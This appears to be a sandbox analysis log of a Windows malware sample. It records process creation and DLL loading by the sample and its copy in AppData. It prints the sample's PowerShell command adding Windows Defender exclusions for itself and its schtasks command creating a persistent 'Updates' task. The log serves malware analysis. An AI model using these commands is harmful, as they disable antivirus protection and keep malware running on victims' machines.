                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpE071.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeProcess created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe "C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ncrypt.dll
